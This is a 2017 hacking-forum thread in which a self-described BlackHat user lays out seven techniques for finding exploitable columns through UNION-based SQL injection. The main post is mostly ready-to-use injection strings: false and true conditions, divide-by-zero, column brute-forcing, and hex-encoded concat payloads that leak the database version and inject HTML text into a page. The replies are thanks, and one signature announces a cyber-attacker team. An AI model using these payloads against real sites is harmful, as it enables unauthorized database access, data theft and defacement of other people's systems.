Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Find Vulnerable Column New

  • 0 Vote(s) - 0 Average


03-08-2017, 11:00 AM #1
MadSec Offline BlackHat **
Registered
Posts:7 Threads:5 Joined:Mar 2017 Reputation: 0
Mood: Mad
How to find Vulnerable Columns?  25 25 25
ANS:-
1st Technique:-
use -> id = -1 union select 1,2,3,4,5--
use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
use -> id = .1/1.2/12.4 union select 1,2,3,4,5--   [Thanks to Crown sir]

Note:- I use null  and bybysql.  Not confuse with them u can use watever u like means use dat things which doesn't exist [Thanks to Hack Forum]

2nd Technique :- False Parameter
Here False Parameter means   put something that make a wrong response into our SQL PARAMETER  like
(a) 1=2, 1=0
use -> id=1 or 1=2 union select 1,2,3,4,5--
use -> id=1 or 1=0 union select 1,2,3,4,5--

(b) Also can we use having, like, <>
use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
use -> id=1  1  like/LIKE 2 union select 1,2,3,4,5--
use -> id=1   1 <> 1 union select 1,2,3,4,5--
use -> id=1 {having/and} 1 like 2  union select 1,2,3,4,5--
use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5--     /* use either  having or and


© Also u can use  and false/AND FALSE statement
use ->  id=1  and false union select 1,2,3,4,5--

3rd Technique :-  Divide by 0  means  -> /0    and  +div+0    
use -> id =12/0 union select 1,2,3,4,5--

use -> id = 12+div+0+ union select 1,2,3,4,5--

4th Technique :- Look closely, or scratch the HTML source code

The number can potentially be display anywhere, when it's kind of rough, just change the query to make the whole thing more visible to something like 

http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--

Above we use 1111 ,2222  instead of 1,2 respectively

After writing dat code  open source code then search  the 'Column Number' like 1111,2222,3333,4444,5555  by using  (CTRL+F :- For finding something in source code) Then check where is dat number appearing in source code

Sometimes the number display on the page title.

When U get the vulnerable columns then u want to  display the version,user,database or some html parts to visible on page  So 4 dat Follow These Steps :-
 
i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
Where  
223e =>    ">
3c696d67207372633d22   =>       <img src="  
*Remeber we use 0x so dat above hex code works

ii.) 4 print our name
id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
Where 
0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d =>   \"><font color = red size=4>AAKASH</font><!--

5th Technique :-
U tried all above technique but stille can't get vulnerable column  then u can also use this 5th technique.... Wats new in this technique    See :-

u can use union select 1,2,3,4,5--   as  union (select 1,2,3,4,5)--
use :- id=-2 union (select 1,2,3,4,5)--     
/*  If u see vul col  like 3 then
 
use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--   

6th Technique :- True Parameter

use -> id=1 +where+1=1  union select 1,2,3,4,5--
use -> id=1 +and+50=50  union select 1,2,3,4,5--
use -> id=1 =75=75  union select 1,2,3,4,5--

7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
Frnds when u can't find  number of columns  then u also can use this techniue. By this technique  not only u find number of columns u also get vulnerable columns.
Follow the following steps
1st do  ->  union select 1--
2nd do -> union select 1,2--
3rd do -> union select 1,2,3--
4th do -> union slect 1,2,3,4--
5th do -> union select 1,2,3,4,5--

Do above steps untill u cant get vulnerable columns Smiley1 


Thanks and credit goes to
1. AJKARO
2. MakMan
3.Benzi  music music

[Image: qXShBci.png]

03-08-2017, 12:22 PM #2
mohamed-capo Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Mar 2017 Reputation: 0
Mood: None
Thumbsupsmileyanim Thumbsupsmileyanim Thumbsupsmileyanim Thumbsupsmileyanim

03-08-2017, 10:29 PM #3
Hunter PCA Offline Junior Member **
Registered
Posts:25 Threads:6 Joined:Mar 2017 Reputation: 0
Mood: Thinking
Old Methods  90 ....

-- I know, I am something, because GOD never creates garbage --

03-10-2017, 01:52 AM #4
Faisal 1337 Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:19 Threads:6 Joined:Jan 2015 Reputation: 2
Mood: Hacker
Old Method Any Good :angel:

[Image: image.php?u=11244812&type=sigpic&dateline=1397182453]
We Are Team Pak Cyber Attackers

03-11-2017, 07:27 AM #5
kasihputih Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Mar 2017 Reputation: 0
Mood: None
nice and keep share bro Smiley1

03-11-2017, 02:47 PM #6
Mr.Hawk Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
Good share..

04-23-2017, 12:35 AM #7
GHT Ghost Offline Junior Member **
Registered
Posts:5 Threads:2 Joined:Mar 2017 Reputation: 1
Mood: None
old but gold
Thanks for sharing bro :p

05-18-2017, 08:54 PM #8
UmairAhmed Offline E@gle Invectus **
Registered
Posts:9 Threads:0 Joined:Mar 2017 Reputation: 0
Mood: None
Thanks for sharing.
OLD is Always GOLD Smiley1

[Image: 21e45xh.jpg]






Forum Jump:


Users browsing this thread:2 Guest(s)